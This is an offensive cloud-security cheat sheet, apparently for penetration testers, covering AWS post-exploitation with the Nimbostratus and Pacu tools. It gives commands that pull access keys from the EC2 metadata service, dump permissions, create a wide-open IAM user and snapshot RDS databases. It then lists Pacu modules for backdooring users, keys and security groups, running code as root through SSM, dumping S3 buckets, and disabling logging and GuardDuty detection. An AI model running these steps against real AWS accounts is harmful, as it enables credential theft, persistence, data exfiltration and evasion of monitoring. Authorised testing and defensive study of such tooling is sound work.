AWS Exploit#
Offensive tooling for AWS recon and post-exploitation. Nimbostratus abuses EC2 metadata; Pacu is the broad post-exploitation framework with modules for IAM enumeration, privesc, persistence, and bucket dumping.
Nimbostratus#
Install.
$ git clone git@github.com:andresriancho/nimbostratus.git
$ cd nimbostratus
$ pip install -r requirements.txt
Prerequisites are an AWS account, an access key, and Boto for Python 2.7.
Insert VULN_URL into the utils/mangle.py file, then run dump-metadata.
$ nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle
Enumerate metadata using the mangle function and retrieve any access key credentials found on the metadata server.
$ nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle
Dump all permissions for the provided credentials. Run right after
dump-credentials.
$ nimbostratus dump-permissions --access-key=AKIA...PXXQ \
--secret-key=...SUW --token=...JFE
Create a new user with a wide-open IAM policy.
$ nimbostratus -v create-iam-user --access-key ...UFUA \
--secret-key ...DDxSZ --token ...tecaoI
Create an RDS snapshot.
$ nimbostratus -v snapshot-rds --access-key ...AUFUA --secret-key ...yDDxSZ \
--token ...K2g2QU= --rds-name <DB_NAME> --password ********* --region us-west-2
Pacu#
Install.
$ git clone https://github.com/RhinoSecurityLabs/pacu
$ cd pacu
$ bash install.sh
$ python3 pacu.py
Starting Pacu. Set keys, list modules, run a module.
$ python3 pacu.py
> set_keys
> ls
> run <module_name> [--keyword-arguments]
Pacu modules#
iam__enum_assume_role, enumerate roles in other accounts for misconfigured trust.iam__enum_users, enumerate IAM users in a separate account.s3__bucket_finder, enumerate / brute-force S3 buckets.aws__enum_account, data about the account itself.aws__enum_spend, account spend by service.codebuild__enum, CodeBuild builds and projects, looking for sensitive data.ebs__enum_volumes_snapshots, EBS volumes and snapshots, flagging any without encryption.ec2__check_termination_protection, list EC2 without termination protection.ec2__download_userdata, downloads User Data from EC2 instances.ec2__enum, broad EC2 enumeration.glue__enum, Glue connections, crawlers, databases, endpoints, jobs.iam__enum_permissions, confirmed permissions list for current or all users.iam__enum_users_roles_policies_groups, users, roles, customer-managed policies, groups.iam__get_credential_report, generate and download IAM credential report.inspector__get_reports, vulnerabilities found by Inspector.lambda__enum, AWS Lambda data.lightsail__enum, Lightsail data.iam__privesc_scan, IAM privilege-escalation path finder. Has trouble parsingNotActions.cloudtrail__csv_injection, inject malicious formulas into CloudTrail event history.vpc__enum_lateral_movement, network-plane lateral movement opportunities.api_gateway__create_api_keys, create API Gateway keys for defined REST APIs.ebs__explore_snapshots, restore and attach EBS snapshots to an instance of your choice.ec2__startup_shell_script, stop and restart EC2 instances to execute code.lightsail__download_ssh_keys, downloads default SSH key pairs.lightsail__generate_ssh_keys, create SSH keys per region.lightsail__generate_temp_access, temporary SSH keys for available instances.systemsmanager__rce_ec2, execute as root / SYSTEM on EC2 via SSM. Linux runs in default shell, Windows in PowerShell. Can delay up to 15 minutes.ec2__backdoor_ec2_sec_groups, add backdoor rules to security groups.iam__backdoor_assume_role, create assume-role trust between users and roles.iam__backdoor_users_keys, add API keys to other users.iam__backdoor_users_password, add passwords to users without one.s3__download_bucket, enumerate and dump files from S3 buckets.cloudtrail__download_event_history, download CloudTrail event history to JSON. About 10000 events per 5 minutes.cloudwatch__download_logs, capture CloudWatch logs to session downloads.detection__disruption, disable, delete, or minimize logging / monitoring.detection__enum_services, detect monitoring and logging.elb__enum_logging, list ELBs without access logging, write the list with logging disabled to session downloads.guardduty__whitelist_ip, add an IP to trusted IPs in GuardDuty. Only one trusted-IP list is allowed per detector; using this may replace an existing list with unintended consequences.waf__enum, WAF rules and rule groups.